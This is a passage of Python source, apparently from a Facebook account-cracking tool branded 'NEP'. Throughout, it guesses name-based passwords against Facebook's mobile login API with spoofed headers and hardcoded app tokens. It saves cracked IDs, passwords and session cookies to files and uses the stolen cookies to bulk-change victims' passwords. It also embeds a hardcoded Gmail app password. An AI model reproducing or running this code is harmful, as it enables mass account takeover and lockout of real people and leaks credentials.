open('/sdcard/NEP-COOKIES.txt','a').write(uid+'|'+pw+'|'+cok+'\n')
break
elif 'www.facebook.com' in q['error']['message']:
p('\r\033[1;91m[NEP-CP] %s | %s \033[1;97m '%(uid,pw))
cp.append(uid)
open('/sdcard/NEP-CP.txt','a').write(uid+'|'+pw+'\n')
break
else:
continue
loop+=1
except requests.exceptions.ConnectionError:
self.method3(uid,nm,pwx)
except Exception as e:
self.method3(uid,nm,pwx)
def method4(self,uid,nm,pwx):
try:
global ok , cp , loop
sys.stdout.write('\r [NEP] %s | M4 OK/CP %s/%s '%(loop,len(ok),len(cp)));sys.stdout.flush()
fn = nm.split(' ')[0]
try:
ln = nm.split(' ')[1]
except:
ln = fn
for ps in pwx:
pw = ps.replace('first',fn.lower()).replace('First',fn).replace('last',ln.lower()).replace('Last',ln).replace('Name',nm).replace('name',nm.lower())
params = {
"access_token": "256002347743983|374e60f8b9bb6b8cbb30f78030438895",
"sdk_version": f"{str(random.randint(1,26))}",
"email": uid,
"locale": "en_PK",
"password": pw,
"sdk": "Android",
"generate_session_cookies": "1",
"sig": "374e60f8b9bb6b8cbb30f78030438895"
}
headers = {
"Host": "graph.facebook.com",
"x-fb-connection-bandwidth": str(random.randint(20000000, 30000000)),
"x-fb-sim-hni": str(random.randint(20000, 40000)),
"x-fb-net-hni": str(random.randint(20000, 40000)),
"x-fb-connection-quality": "EXCELLENT",
"user-agent": iAmMethod4Ua(),
"content-type": "application/x-www-form-urlencoded",
"x-fb-http-engine": "Liger",
"Authorization":"Auth2 256002347743983|374e60f8b9bb6b8cbb30f78030438895",
}
q = ses.post("https://b-graph.facebook.com/auth/login",params=params, headers=headers, allow_redirects=False).json()
if "session_key" in q:
#print(q)
token = q["access_token"]
cok = ";".join(i["name"]+"="+i["value"] for i in q["session_cookies"])
open('/sdcard/COOKIES_TOKEN.txt','a').write(cok+'|'+token+'\n')
p('\r\033[1;92m[NEP-OK] %s | %s \033[1;97m '%(uid,pw))
ok.append(uid)
open('/sdcard/NEP_M4_OK.txt','a').write(uid+'|'+pw+'\n')
open('/sdcard/NEP_M4_COOKIES.txt','a').write(uid+'|'+pw+'|'+cok+'\n')
break
elif 'www.facebook.com' in q['error']['message']:
p('\r\033[1;91m[NEP-CP] %s | %s \033[1;97m '%(uid,pw))
cp.append(uid)
open('/sdcard/NEP_M4_CP.txt','a').write(uid+'|'+pw+'\n')
break
else:
continue
loop+=1
except requests.exceptions.ConnectionError:
self.method4(uid,nm,pwx)
except Exception as e:
self.method4(uid,nm,pwx)
def r_crack(self,uid,pwx):
try:
global ok , cp , loop
sys.stdout.write('\r [NEP] %s | Random\ OK/CP %s/%s '%(loop,len(ok),len(cp)));sys.stdout.flush()
for pw in pwx:
data = {"adid": str(uuid.uuid4()),
"format": "json",
"device_id": str(uuid.uuid4()),
"cpl": "true",
"family_device_id": str(uuid.uuid4()),
"credentials_type": "device_based_login_password",
"error_detail_type": "button_with_disabled",
"source": "register_api",
"email": uid,
"password": pw,
"access_token": "350685531728|62f8ce9f74b12f84c123cc23437a4a32",
"generate_session_cookies": "1",
"meta_inf_fbmeta": "NO_FILE",
"advertiser_id": str(uuid.uuid4()),
"currently_logged_in_userid": "0",
"locale": "en_PK",
"device":"Samsung",
"sdk":"Android",
"client_country_code": "PK",
"method": "auth.login",
"fb_api_req_friendly_name": "authenticate",
"fb_api_caller_class": "com.facebook.account.login.protocol.Fb4aAuthHandler",
"api_key": "882a8490361da98702bf97a021ddc14d"}
headers = {'User-Agent': None,
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'graph.facebook.com',
'X-FB-Net-HNI': str(random.randint(20000, 40000)),
'X-FB-SIM-HNI': str(random.randint(20000, 40000)),
'X-FB-Connection-Type': f'{SEX}',
'Authorization':'OAuth 6628568379|c1e620fa708a1d5696fb991c1bde5662',
'X-FB-Connection-Quality':f'{SEX}',
"X-FB-Connection-Bandwidth": str(random.randint(20000000, 30000000)),
'X-Tigon-Is-Retry': 'False',
'x-fb-session-id': 'nid=jiZ+yNNBgbwC;pid=Main;tid=132;nc=1;fc=0;bc=0;cid=d29d67d37eca387482a8a5b740f84f62',
'x-fb-device-group': '5120',
'X-FB-Friendly-Name': 'ViewerReactionsMutation',
'X-FB-Request-Analytics-Tags': 'graphservice',
'X-FB-HTTP-Engine': 'Liger',
'X-FB-Client-IP': 'True',
'X-FB-Server-Cluster': 'True',
'x-fb-connection-token': 'd29d67d37eca387482a8a5b740f84f62'}
q = ses.post("https://b-graph.facebook.com/auth/login",data=data, headers=headers, allow_redirects=False).json()
if "session_key" in q:
coki = ";".join(i["name"]+"="+i["value"] for i in q["session_cookies"]);sb = base64.b64encode(os.urandom(18)).decode().replace("=","").replace("+","_").replace("/","-")
cookie = f"sb={sb};{coki}"
p('\r\033[1;92m[NEP-OK] %s | %s \033[1;97m '%(uid,pw))
ok.append(uid)
open('/sdcard/NEP_NUM_OK.txt','a').write(uid+'|'+pw+'\n')
open('/sdcard/NEP_NUM_COOKIES.txt','a').write(uid+'|'+pw+'|'+cookie+'\n')
break
elif 'www.facebook.com' in q['error']['message']:
p('\r\033[1;91m[NEP-CP] %s | %s \033[1;97m '%(uid,pw))
cp.append(uid)
open('/sdcard/NEP_NUM_CP.txt','a').write(uid+'|'+pw+'\n')
break
else:
continue
loop+=1
except requests.exceptions.ConnectionError:
self.r_crack(uid,pwx)
except Exception as e:
print(e)
class Join:
def __init_(self):
logo()
#s.system("xdg-open https://wa.me/+923152056613").
def Whatsapp(self):
os.system('xdg-open https://chat.whatsapp.com/HF3burNYuZx0den94ooYbk')
iAmMain().iAmMenu()
def Facebook(self):
os.system('xdg-open https://facebook.com/groups/124939013896146/')
iAmMain().iAmMenu()
class Grep:
def __init__(self):
logo()
def remove_links(self):
file = input(" [✓] File Path :- ")
try:
open(file,'r').read()
print(" [✓] Example /sdcard/file1.txt ")
out = input(" [=] Save Path :- ")
os.system('touch '+out)
os.system('sort -r '+file+' | uniq > '+out)
p(" [ All double links are Removed ] ")
p(" [•] Your File Saved in %s "%(out))
input(" [ Press Enter To Go Back ] ")
time.sleep(1)
self.remove_links()
except:
p(" [ File Not Found ] ");sp(1);self.remove_links()
def links_only(self):
os.system("rm -rf .tmp.txt")
try:
p(" [ Example :- /sdcard/file.txt ] ")
file = input(" [•|•] Enter File Path :- ")
line()
p(" Example :- /sdcard/file1.txt ")
sav = input(" [✓] Enter Save Path :- ")
line()
p(" [•] Example :- 1 , 2 , 3 , 4 , 5 , 6 etc ")
try:
limit = int(input(" [•|•] how many links you wants to grep :- "))
line()
except:
limit = 1
t = open(file,"r").read().splitlines()
xx = open(".tmp.txt","a")
for x in t:
uid = x.split("|")[0]
xx.write(uid+'\n')
xx.close()
p(" Example :- 100089,88,87 etc")
for n in range(limit):
print(open(".tmp.txt","r").read().splitlines())
digit = int(input(" [•|•] Enter Digit %s :- "%(n+1)))
line()
os.system('cat .tmp.txt | grep '+str(digit)+' >>'+sav+' ')
p(" [ Your File Saved in :- %s ] "%(sav))
input(" [ Press Enter To go Back ] ")
sp(1)
self.links_only()
except Exception as e:
print(" [^=^] Your File Not Found :( ")
sp(2);self.links_only()
def with_names(self):
try:
p(" Example :- /sdcard/file.txt ")
line()
file = input(" [✓] File Path :- ")
line()
p(" Example :- /sdcard/file1.txt ")
ofile= input(" [✓] File Save Path :- ")
line()
try:
p(" Example :- 1 ,2,3,4,5 etc ")
limit = int(input(" [=] How many Links with names you wanna grab :- "))
except:
limit = 2
p(" Example :- 100089 , 100088 etx ")
for n in range(limit):
line()
digit = int(input(" [•|•] Put Digits %s :- "%(n+1)))
os.system('cat '+file+' | grep '+str(digit)+' >>'+ofile+' ')
p(" [ Your File Saved in :- %s ] "%(ofile))
input(" [ Press Enter To go Back ] ")
sp(1)
self.with_names()
except:
p(" [X] File Not Found ;( ");sp(1);self.with_names()
class Server:
def report(self):
logo()
print(" [•] Ex Cp issues/New updates Etc ")
print(' [•] Please Describe issues in details\n [•] It will be send to Admin ')
line()
issue = input(' [•] Describe your Problem : ')
name = input(' [•] Enter Your Name :- ')
email = input(' [•] Enter Your Email/Contact/Fb Link : ')
print(' [•] Sending Your Appeal .....')
form = f' __________________\n Full Name : {name} \n Email : {email} \n Issues : {issue} '
TEXT = form
SUBJECT = " Dilute Codes Users Feedback"
message = ('Subject: {}\n\n{}').format(SUBJECT, TEXT)
se = "[email protected]"
rse = "[email protected]"
username = "[email protected]"
password = "usqscwnpoyehoytc"
server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
server.login(username, password)
server.sendmail(se, rse, message)
print(" [•] Your Appleal Has been Submitted ")
print(form)
exit()
class automation:
def __init__(self):
self.url = "https://free.facebook.com"
def menu(self):
logo()
p(" [1] Facebook Password Change Menu ")
p(' [2] Cut Used File lines ')
am = input(" [•] Select an option : ")
if am == "1":self.iAmPasswordManager()
elif am == "2":self.used_cutter()
else:
p(" [•] wrong select!! ");sp(2);self.menu()
def used_cutter(self):
clear()
logo()
lines=[]
p(" [•] Ex : /sdcard/file.txt")
try:
file = input(" [•] Put File Path : ")
except Exception as e:
print(" [•] File Path Incorrect!! ");sp(2);self.used_cutter()
digit= int(input(" [•] Put Line Num :"))
with open(file,"r") as r:
lines = r.readlines()
with open(file,"w") as w:
for num,line in enumerate(lines):
if num >= digit:
w.write(line)
p(" [•] File Splitted Complete")
def iAmPasswordManager(self):
logo()
p(" [•] Password Changer By : NEP")
line()
p(" [1] Change Passwords (Bulk) \n [2] Change Single Account Password \n [3] Change Default Password \n [B] Press B To Back ")
line()
iamoption = input(' [•] Choose : ')
if iamoption == '1':
self.bulk_password()
elif iamoption =='2':
self.single_password()
elif iamoption =='3':
self.change_default()
elif iamoption =='B':
iAmApprovelSystem()
else:
p(" [•] Wrong Select ! ")
sp(2);self.iAmPasswordManager()
def bulk_password(self):
sav = "/sdcard/dilute_passwords.txt"
try:
iamdefaultpassword= open(".default_password.txt","r").read()
except FileNotFoundError:
iamdefaultpassword = "NEP@@@"
logo()
p(" [•] Password Changer By : NEP")
line()
print(" [•] Default Password : %s "%(iamdefaultpassword))
line()
np = iamdefaultpassword
try:
file = input(" [•] Put File Path : ")
id = open(file,"r").read().splitlines()
except FileNotFoundError:
print(" [•] File Not Found ! ")
sp(2)
self.bulk_password()
logo()
print(" [•] Password Changing Procces is started ! ")
line()
p(" [•] Total File Accounts : %s "%(len(id)))
line()
p(" [•] Please Be Patience Use Fast Internet ")
line()
for x in id:
uid = x.split("|")[0]
pw = x.split('|')[1]
cok = x.split('|')[2]
cookies = {"cookie":cok}
try:
r = requests.get('https://free.facebook.com',cookies=cookies).text.replace("amp;","")
except CE:
p(" [•] Check Your Internet")
except Exception as e:
print(e)
if "/zero/optin/write/?" in r:
self.iAmFreeMode(cookies,r)
try:
r= requests.get("https://free.facebook.com/settings/security/password/?",cookies=cookies).text
r= r.replace("amp;","")
except CE:
print(" [•] Check Your Internet Unexpected Stopped ! ")
exit()
next = re.findall('action\="(.*?)"',r)[1]
data = {
"fb_dtsg":re.findall('name="fb_dtsg" value="(.*?)"',r),
"jazoest":re.findall('name="jazoest" value="(.*?)"',r),
"password_change_session_identifier":re.findall('name="password_change_session_identifier" value="(.*?)"',r),
"password_old":pw,
"password_new":np,
"password_confirm":np,
"save": "Save changes"
}
po = requests.post("https://free.facebook.com"+str(next),cookies=cookies,data=data).text
po = po.replace("amp;","")
if 'Password changed' in po:
p(" [•] \033[1;92m✓ Password Changed Succesfully : \033[1;97m%s "%(uid))
open(sav,"a").write(uid+'|'+np+'\n')
else:
p(" [•]\033[1;91m Failed To Changed Password : \033[1;97m%s "%(uid))
line()
print(" [•] Proccess Has Been Completed ! ")
print(" [•] Your File Saved in %s "%(sav))
line()
input(" [•] Press Enter To Go Back to Password Menu ! ")
sp(1)
self.iAmPasswordManager()